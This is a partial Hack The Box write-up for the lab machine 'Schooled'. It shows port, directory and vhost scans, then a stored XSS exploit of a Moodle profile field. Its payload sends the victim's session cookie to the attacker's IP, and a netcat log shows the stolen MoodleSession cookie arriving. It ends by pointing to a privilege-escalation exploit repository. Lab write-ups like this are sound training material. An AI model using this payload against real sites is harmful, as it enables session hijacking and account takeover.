Schooled

Hack The Box Machines No Comments
$ echo "10.10.10.234 schooled.htb" | sudo tee -a /etc/hosts
$ sudo nmap -p- -T4 -A 10.10.10.234
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 11:16 EDT
Nmap scan report for 10.10.10.234
Host is up (0.026s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp    open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
$ dirb http://10.10.10.234
---- Scanning URL: http://10.10.10.234/ ----
 ==> DIRECTORY: http://10.10.10.234/css/                                                                                                                                           
 ==> DIRECTORY: http://10.10.10.234/fonts/                                                                                                                                         
 ==> DIRECTORY: http://10.10.10.234/images/                                                                                                                                        
 http://10.10.10.234/index.html (CODE:200|SIZE:20750)                                                                                                                            
 ==> DIRECTORY: http://10.10.10.234/js/                                                                                                                                             
 ---- Entering directory: http://10.10.10.234/css/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
 (Use mode '-w' if you want to scan it anyway)                  
 ---- Entering directory: http://10.10.10.234/fonts/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
 (Use mode '-w' if you want to scan it anyway)
 ---- Entering directory: http://10.10.10.234/images/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
 (Use mode '-w' if you want to scan it anyway)
 ---- Entering directory: http://10.10.10.234/js/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
 (Use mode '-w' if you want to scan it anyway) 
$ nikto -h http://10.10.10.234
 Server: Apache/2.4.46 (FreeBSD) PHP/7.4.15
 The anti-clickjacking X-Frame-Options header is not present.
 The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 No CGI Directories found (use '-C all' to force check all possible dirs)
 Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE 
 OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
 OSVDB-3268: /css/: Directory indexing found.
 OSVDB-3092: /css/: This might be interesting…
 OSVDB-3268: /images/: Directory indexing found.
 7864 requests: 0 error(s) and 8 item(s) reported on remote host 
$ whatweb schooled.htb
http://schooled.htb [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 (FreeBSD) PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE=edge] 

On web pages:
admissions@schooled.htb
Jane Higgins Scientific Research Lecturer 
Lianne Carter Manager & English Lecturer 
Manuel Phillips Mathematics Lecturer 
Jamie Borham Information Technology Lecturer 
All content will be delivered over Moodle. 
$ gobuster -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt vhost -u http://schooled.htb -o subdomain_schooled.htb
Found: moodle.schooled.htb (Status: 200) [Size: 84]
$ ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://schooled.htb -H "Host: FUZZ.schooled.htb" -fw 5338
moodle                  [Status: 200, Size: 84, Words: 5, Lines: 2]
$ echo "10.10.10.234 moodle.schooled.htb" | sudo tee -a /etc/hosts

CVE-2020-25627 the moodlenet profile field is vulnerable to stored XSS https://moodle.org/mod/forum/discuss.php?d=410839
Session Hijack
<script>new Image().src="http://10.10.14.149/bogus.php?output="+document.cookie;</script>
add it into MoodleNet profile 

kali@kali:~/0.htb/machines/Schooled234$ nc -lnvp 80
listening on [any] 80 ...
listening on [any] 80 ...
connect to [10.10.14.149] from (UNKNOWN) [10.10.10.234] 55198
GET /bogus.php?output=MoodleSession=go8f0r3ct801atmtrd6aicpegd HTTP/1.1
Host: 10.10.14.149
User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://moodle.schooled.htb/moodle/user/profile.php?id=29

Moodle privesc to manager
CVE-2020-14321
https://github.com/HoangKien1020/CVE-2020-14321
{https://vimeo.com/441698193}

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation